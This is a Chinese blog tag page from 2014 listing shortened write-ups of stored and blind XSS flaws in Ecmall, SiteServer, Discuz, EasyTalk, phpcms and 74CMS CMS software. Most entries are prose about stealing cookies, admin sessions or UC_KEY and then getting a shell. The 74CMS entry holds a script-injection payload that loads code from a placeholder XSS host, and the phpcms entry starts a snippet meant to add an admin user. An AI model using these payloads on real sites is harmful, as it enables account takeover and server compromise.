标签 xss 下的文章

Ecmall某处存储型xss 2(有条件)

漏洞作者: ecbug这里仅仅测试一下xss的点在哪里,至于漏洞利用,这个点和之前那个xss1是一样的也可以getshell。1.鸡肋的地方在于后台必须开启团购功能: 2.发布团购商品,还是按照老办法来fuzz一下:  3.查看该商品页面发现某处又过滤不严,存在xss漏洞  4.老方法拿shell

没穿底裤 2014 年 06 月 08 日 暂无评论

siteserver3.6.4非常好用的xss盲打进后台可shell

iteserver, .net下最强cms,功能确实很强大,但是 xss盲打后台。 后台限制不多,shell很容易。。。。由于asp.net默认是在高权限运行的,是吧,在3.6.4 站点管理>功能管理>提交表单 中,默认的表单提交未做任何过滤,导致了xss盲打后台。就插了下 后来有一天cookie到了 登上去,才发现是siteserver的,3.6.4我其实xss了两下,都成功了。。。 ...

没穿底裤 2014 年 05 月 17 日 1 条评论

Discuz某处XSS劫持UC_KEY(XSS应用详细过程)

这个漏洞的位置在Discuz的门户功能处。 在发表文章时,打开“编辑源码”功能时,写入任意XSS CODE后,再进入和输出都没有过滤。导致存储型XSS。 大家都知道,这里的XSS虽然可以劫持到用户和管理的Cookies,但是没什么用,无法登陆。 那么,我们可以想办法拿XSS来干点其他的,比如劫持管理员后台内容,如UC_KEY等。 因为默认安装情况下这个门户功能是没有配...

没穿底裤 2014 年 04 月 25 日 暂无评论

EasyTalk以系统身份向用户发XSS

出现问题的代码文件路径 : easytalk/Home/Lib/Action/ImAction.class.php 代码加载时 [php] public function _initialize() {parent::init();}[/php] 没要求登录而EasyTalk存储型XSS和以系统身份向任意用户发私信的漏洞在这代码 [php] //发表聊天public function sen...

没穿底裤 2014 年 04 月 25 日 暂无评论

phpcms V9黄页某处储存性XSS可盲打后台

我们要注册一个会员,然后才可以申请商务中心。可是商务中心是要求填写企业的资料的。我们再申请的时候可以这样子填写 标题处插入我们预置的XSS,除了可以偷取cookie以外,我们还可以写一个加用户的js [php] documen.write('');//接收后台与cookieif(top.window.location.href.indexOf("pc_hash=")>0){var hash ...

没穿底裤 2014 年 03 月 22 日 暂无评论

骑士人才(74CMS)3.X通杀XSS

Author:毒药 这个XSS好像是从12年3.1开始就存在的吧,到现在的3.4还是没有修复。漏洞页面:link/add_link.php 友情链接:LOGO处填写[php]><script src=http://xss地址></script> //将<>进行16进制编码[/php] add_link.php [php] $setsqlarr['li...

没穿底裤 2014 年 03 月 21 日 暂无评论